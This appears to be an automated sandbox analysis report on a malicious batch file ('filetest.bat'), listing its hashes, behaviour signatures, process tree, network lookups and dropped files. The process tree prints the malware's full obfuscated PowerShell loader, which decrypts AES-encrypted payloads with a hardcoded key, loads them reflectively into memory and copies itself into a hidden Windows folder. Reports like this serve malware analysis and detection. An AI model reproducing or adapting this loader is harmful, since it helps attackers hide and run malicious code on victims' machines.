Resubmissions

17/01/2025, 19:07 UTC

250117-xsph9a1jek 10

17/01/2025, 19:00 UTC

250117-xn3kbazqhk 10

Analysis

  • max time kernel
    17s
  • max time network
    4s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    17/01/2025, 19:00 UTC

General

  • Target

    filetest.bat

  • Size

    7.9MB

  • MD5

    f88d18fc65296a1ed460e40a352e3045

  • SHA1

    f6d9d94da2f11d0485ca057a057a06ac492bde8c

  • SHA256

    f3cbb5d82cd929211283435c7dd79e7c853449ad23e7d4895b9fc0427759ba7f

  • SHA512

    f193edd5c475040928e188b756d27ecb2f61ef6a1d7392bdb62e6d5bcdd5c37272849a298e9cc6265b5f67890881971ecf28f93e98edd90f6f536190999ed367

  • SSDEEP

    49152:h4ANZ4/rNl/dichvhGpPK7kMes5mmCq/BWZHtPrBe7XTADqoh6EKQJS2H/WkTb/2:6

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:624
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:1028
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{5af75819-01cb-4f3c-ab82-4a82f9aa62b0}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3572
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:676
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:968
        • C:\Windows\System32\svchost.exe
          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
          1⤵
            PID:396
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:444
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
              1⤵
                PID:540
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                  PID:1056
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  1⤵
                    PID:1096
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                    1⤵
                      PID:1168
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                      1⤵
                        PID:1184
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                        1⤵
                          PID:1192
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                          1⤵
                            PID:1280
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                            1⤵
                              PID:1380
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1400
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                1⤵
                                  PID:1420
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                  1⤵
                                    PID:1504
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                    1⤵
                                      PID:1512
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                      1⤵
                                        PID:1528
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                        1⤵
                                          PID:1676
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1692
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                            1⤵
                                              PID:1852
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1860
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1876
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1916
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                    1⤵
                                                      PID:1932
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                      1⤵
                                                        PID:2280
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\filetest.bat"
                                                        1⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:236
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
                                                          2⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4672
                                                          • C:\Windows\system32\findstr.exe
                                                            "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
                                                            3⤵
                                                              PID:4916
                                                          • C:\Windows\system32\cmd.exe
                                                            cmd.exe /c echo function qmFV($REHT){ Invoke-Expression -InformationAction Ignore '$TTZK=vB[vBSvByvBstvBevBmvB.vBSvBevBcvBurvBivBtvBy.vBCvBrvBypvBtvBovBgrvBapvBhvBy.vBAevBsvB]:vB:vBCvBrvBeavBtvBevB()vB;'.Replace('vB', ''); Invoke-Expression -Debug '$TTZK.PkMPkoPkdPke=Pk[PkSPkyPksPktPkePkm.PkSPkePkcuPkrPkiPktyPk.PkCPkryPkptPkoPkgrPkapPkhPky.PkCPkiPkpPkhePkrPkMPkodPkePk]:Pk:PkCPkBCPk;'.Replace('Pk', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose '$TTZK.vsPvsavsdvsdivsnvsgvs=vs[vsSvsyvsstvsevsmvs.Svsevscvsurvsivstvsy.vsCrvsyvsptvsogvsrvsapvshvsyvs.vsPavsdvsdvsinvsgvsMovsdvsevs]:vs:vsPvsKvsCvsSvs7vs;'.Replace('vs', ''); Invoke-Expression -Debug '$TTZK.xPKxPexPyxP=[xPSxPyxPsxPtxPexPmxP.CxPoxPnxPvexPrxPtxP]:xP:xPFxProxPmBxPaxPsexP64xPSxPtrxPixPnxPg("xPhxPOxPixPbxxP/xPTxPsxPDxPUxPfxPQDxPvxPLxP4VxPDxPHxP90xPGxPfxP9kxPJCxPixPJFxPcuxPDxP8yxPAxPbxPMxPeCxP4xPWxPc=xP");'.Replace('xP', ''); Invoke-Expression -Debug '$TTZK.dkIdkVdk=dk[Sdkydksdktdkedkmdk.dkCodkndkvdkerdktdk]dk::dkFdkrdkomdkBadksdke6dk4Sdktdkridkndkg("dkBdkvdkidkt0dkjdkfdkAdkudkJdk4dk7Jdk1dkLdk6bdkOdkGdk79dkQdk=dk=");'.Replace('dk', ''); $pOIf=$TTZK.CreateDecryptor(); $TvBT=$pOIf.TransformFinalBlock($REHT, 0, $REHT.Length); $pOIf.Dispose(); $TTZK.Dispose(); $TvBT;}function MetK($REHT){ Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore '$RRoW=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA(,$REHT);'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$HnaT=pANpAepAwpA-OpAbpAjpAepAcpAtpA pASypAspAtpAempA.pAIpAO.pAMpAepAmopArypASpAtrpAeapAmpA;'.Replace('pA', ''); Invoke-Expression -Verbose -WarningAction Inquire '$OYGv=KVNKVeKVwKV-OKVbKVjKVeKVcKVtKV KVSyKVsKVtKVemKV.KVIKVO.KVCKVoKVmpKVreKVsKVsiKVonKV.KVGZKViKVpKVSKVtrKVeKVaKVm($RRoW, KV[KVIKVOKV.CKVoKVmKVpKVrKVeKVsKVsiKVoKVnKV.CKVoKVmKVprKVeKVsKVsiKVonKVMKVodKVe]KV:KV:DKVeKVcKVoKVmpKVrKVeKVssKV);'.Replace('KV', ''); $OYGv.CopyTo($HnaT); $OYGv.Dispose(); $RRoW.Dispose(); $HnaT.Dispose(); $HnaT.ToArray();}function EXHV($REHT,$EVat){ Invoke-Expression -Verbose '$gHke=DN[DNSDNyDNstDNeDNmDN.DNRDNeDNfDNleDNcDNtDNioDNnDN.DNAsDNsDNeDNmbDNlyDN]DN::DNLoDNaDNd([byte[]]$REHT);'.Replace('DN', ''); Invoke-Expression -InformationAction Ignore '$vNwL=$gHke.CAECAnCAtCAryCAPCAoCAiCAnCAtCA;'.Replace('CA', ''); Invoke-Expression -Debug -InformationAction Ignore -WarningAction Inquire '$vNwLio.ioIioniovoiokioeio(io$ioniouiollio, $EVat);'.Replace('io', '');}function JYY($vrvS){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'MhRVQwCgfyDG;ODJpvpxTYFqN;dlOMrqSijFnyTh'; Set-ItemProperty -Path $registryPath -Name 'MhRVQwCgfyDG' -Value $vrvS; Set-ItemProperty -Path $registryPath -Name 'ODJpvpxTYFqN' -Value 'hOibx/TsDUfQDvL4VDH90Gf9kJCiJFcuD8yAbMeC4Wc='; Set-ItemProperty -Path $registryPath -Name 'dlOMrqSijFnyTh' -Value 'Bvit0jfAuJ47J1L6bOG79Q==';}$lVPp = 'C:\Users\Admin\AppData\Local\Temp\filetest.bat';$host.UI.RawUI.WindowTitle = $lVPp;$Enkb=[System.IO.File]::ReadAllText($lVPp).Split([Environment]::NewLine);foreach ($bUJs in $Enkb) { if ($bUJs.StartsWith('WWiTL')) { $DBhl=$bUJs.Substring(5); break; }}JYY $DBhl;$vrvS=[string[]]$DBhl.Split('\');Invoke-Expression -Debug -WarningAction Inquire -InformationAction Ignore -Verbose '$opM = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[0].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Debug '$tHS = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[1].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');Invoke-Expression -Verbose -Debug '$Hrm = MetK (qmFV (tq[tqCtqotqnvtqetqrtqttq]tq:tq:tqFrtqotqmtqBatqstqetq64tqStqttqritqngtq($vrvS[2].Replace("#", "/").Replace("@", "A"))));'.Replace('tq', '');EXHV $opM $null;EXHV $tHS $null;EXHV $Hrm (,[string[]] (''));
                                                            2⤵
                                                              PID:724
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell.exe -WindowStyle Hidden
                                                              2⤵
                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                              • Command and Scripting Interpreter: PowerShell
                                                              • Suspicious use of SetThreadContext
                                                              • Drops file in Windows directory
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of WriteProcessMemory
                                                              PID:3780
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\filetest.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat
                                                                3⤵
                                                                  PID:2328
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                                  3⤵
                                                                    PID:712
                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                1⤵
                                                                  PID:3656

                                                                Network

                                                                • flag-us
                                                                  DNS
                                                                  8.8.8.8.in-addr.arpa
                                                                  Dnscache
                                                                  Remote address:
                                                                  8.8.8.8:53
                                                                  Request
                                                                  8.8.8.8.in-addr.arpa
                                                                  IN PTR
                                                                  Response
                                                                  8.8.8.8.in-addr.arpa
                                                                  IN PTR
                                                                  dnsgoogle
                                                                • flag-us
                                                                  DNS
                                                                  68.32.126.40.in-addr.arpa
                                                                  Dnscache
                                                                  Remote address:
                                                                  8.8.8.8:53
                                                                  Request
                                                                  68.32.126.40.in-addr.arpa
                                                                  IN PTR
                                                                  Response
                                                                • flag-us
                                                                  DNS
                                                                  50.196.221.88.in-addr.arpa
                                                                  Dnscache
                                                                  Remote address:
                                                                  8.8.8.8:53
                                                                  Request
                                                                  50.196.221.88.in-addr.arpa
                                                                  IN PTR
                                                                  Response
                                                                  50.196.221.88.in-addr.arpa
                                                                  IN PTR
                                                                  a88-221-196-50deploystaticakamaitechnologiescom
                                                                • flag-us
                                                                  DNS
                                                                  218.99.81.104.in-addr.arpa
                                                                  Dnscache
                                                                  Remote address:
                                                                  8.8.8.8:53
                                                                  Request
                                                                  218.99.81.104.in-addr.arpa
                                                                  IN PTR
                                                                  Response
                                                                  218.99.81.104.in-addr.arpa
                                                                  IN PTR
                                                                  a104-81-99-218deploystaticakamaitechnologiescom
                                                                No results found
                                                                • 8.8.8.8:53
                                                                  8.8.8.8.in-addr.arpa
                                                                  dns
                                                                  Dnscache
                                                                  66 B
                                                                  90 B
                                                                  1
                                                                  1

                                                                  DNS Request

                                                                  8.8.8.8.in-addr.arpa

                                                                • 8.8.8.8:53
                                                                  68.32.126.40.in-addr.arpa
                                                                  dns
                                                                  Dnscache
                                                                  71 B
                                                                  157 B
                                                                  1
                                                                  1

                                                                  DNS Request

                                                                  68.32.126.40.in-addr.arpa

                                                                • 8.8.8.8:53
                                                                  50.196.221.88.in-addr.arpa
                                                                  dns
                                                                  Dnscache
                                                                  72 B
                                                                  137 B
                                                                  1
                                                                  1

                                                                  DNS Request

                                                                  50.196.221.88.in-addr.arpa

                                                                • 8.8.8.8:53
                                                                  218.99.81.104.in-addr.arpa
                                                                  dns
                                                                  Dnscache
                                                                  72 B
                                                                  137 B
                                                                  1
                                                                  1

                                                                  DNS Request

                                                                  218.99.81.104.in-addr.arpa

                                                                MITRE ATT&CK Enterprise v15

                                                                Replay Monitor

                                                                Loading Replay Monitor...

                                                                Downloads

                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                  Filesize

                                                                  3KB

                                                                  MD5

                                                                  87c29700d926d094566f97a4ca94661f

                                                                  SHA1

                                                                  edbc46e5510447273bbaae1a5d13e6984b003594

                                                                  SHA256

                                                                  b254694891c8c9da1394c3c469cee50f145c72582e6d1cf0045cab4e72f48e7f

                                                                  SHA512

                                                                  0c6ba3544daa14af98f338fa24d01624f9e93f9633b2bd6b4c031f7f1ecd4265dddde4469a8b96e81d802401ec8f3ba1d0120afe53ee6fa5345f9f3f7ab94290

                                                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zuhelapi.pbc.ps1

                                                                  Filesize

                                                                  60B

                                                                  MD5

                                                                  d17fe0a3f47be24a6453e9ef58c94641

                                                                  SHA1

                                                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                  SHA256

                                                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                  SHA512

                                                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                • C:\Windows\$rbx-onimai2\$rbx-CO2.bat

                                                                  Filesize

                                                                  6.3MB

                                                                  MD5

                                                                  89008f5ff31d97989dc8683d8637fb9a

                                                                  SHA1

                                                                  2643e07ddeee6757a31725fdd76aa5670f0b257e

                                                                  SHA256

                                                                  0789be73a9680c5407f9584b0a5e9a521b328a4e8d7bd1f0ad4076699ca99f80

                                                                  SHA512

                                                                  c295440add226d0b5f930e7c318ce542045e1851744dec6663eed62029bbfcf63361f8a70f56d0f4d7d515eabcaaa73e95078f8b44182e2efd14d61fbb4505b1

                                                                • memory/396-81-0x000001A12CFC0000-0x000001A12CFEA000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/396-86-0x000001A12CFC0000-0x000001A12CFEA000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/396-87-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/444-97-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/444-91-0x0000019D05060000-0x0000019D0508A000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/444-96-0x0000019D05060000-0x0000019D0508A000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/624-56-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/624-50-0x000001F0789C0000-0x000001F0789EA000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/624-49-0x000001F0789C0000-0x000001F0789EA000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/624-48-0x000001F078930000-0x000001F078955000-memory.dmp

                                                                  Filesize

                                                                  148KB

                                                                • memory/624-55-0x000001F0789C0000-0x000001F0789EA000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/676-60-0x0000020AAF040000-0x0000020AAF06A000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/676-66-0x0000020AAF040000-0x0000020AAF06A000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/676-67-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/968-71-0x000001D4D2510000-0x000001D4D253A000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/968-77-0x00007FFF702B0000-0x00007FFF702C0000-memory.dmp

                                                                  Filesize

                                                                  64KB

                                                                • memory/968-76-0x000001D4D2510000-0x000001D4D253A000-memory.dmp

                                                                  Filesize

                                                                  168KB

                                                                • memory/3572-42-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/3572-40-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/3572-37-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/3572-44-0x00007FFFAE310000-0x00007FFFAE3CD000-memory.dmp

                                                                  Filesize

                                                                  756KB

                                                                • memory/3572-43-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

                                                                  Filesize

                                                                  2.0MB

                                                                • memory/3572-45-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/3572-38-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/3572-39-0x0000000140000000-0x0000000140008000-memory.dmp

                                                                  Filesize

                                                                  32KB

                                                                • memory/3780-32-0x000001B76A730000-0x000001B76A76E000-memory.dmp

                                                                  Filesize

                                                                  248KB

                                                                • memory/3780-176-0x000001B76DBF0000-0x000001B76DF64000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/3780-35-0x00007FFFB0230000-0x00007FFFB0428000-memory.dmp

                                                                  Filesize

                                                                  2.0MB

                                                                • memory/3780-34-0x00007FFF91E90000-0x00007FFF92952000-memory.dmp

                                                                  Filesize

                                                                  10.8MB

                                                                • memory/3780-33-0x000001B76D290000-0x000001B76D82E000-memory.dmp

                                                                  Filesize

                                                                  5.6MB

                                                                • memory/3780-36-0x00007FFFAE310000-0x00007FFFAE3CD000-memory.dmp

                                                                  Filesize

                                                                  756KB

                                                                • memory/3780-31-0x000001B76D210000-0x000001B76D286000-memory.dmp

                                                                  Filesize

                                                                  472KB

                                                                • memory/3780-30-0x000001B76CDB0000-0x000001B76CDF4000-memory.dmp

                                                                  Filesize

                                                                  272KB

                                                                • memory/3780-29-0x00007FFF91E90000-0x00007FFF92952000-memory.dmp

                                                                  Filesize

                                                                  10.8MB

                                                                • memory/3780-28-0x00007FFF91E90000-0x00007FFF92952000-memory.dmp

                                                                  Filesize

                                                                  10.8MB

                                                                • memory/3780-18-0x00007FFF91E90000-0x00007FFF92952000-memory.dmp

                                                                  Filesize

                                                                  10.8MB

                                                                • memory/4672-0-0x00007FFF91E93000-0x00007FFF91E95000-memory.dmp

                                                                  Filesize

                                                                  8KB

                                                                • memory/4672-13-0x00007FFF91E90000-0x00007FFF92952000-memory.dmp

                                                                  Filesize

                                                                  10.8MB

                                                                • memory/4672-12-0x00007FFF91E90000-0x00007FFF92952000-memory.dmp

                                                                  Filesize

                                                                  10.8MB

                                                                • memory/4672-11-0x00007FFF91E90000-0x00007FFF92952000-memory.dmp

                                                                  Filesize

                                                                  10.8MB

                                                                • memory/4672-16-0x00007FFF91E90000-0x00007FFF92952000-memory.dmp

                                                                  Filesize

                                                                  10.8MB

                                                                • memory/4672-1-0x000001FD60280000-0x000001FD602A2000-memory.dmp

                                                                  Filesize

                                                                  136KB

                                                                We care about your privacy.

                                                                This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.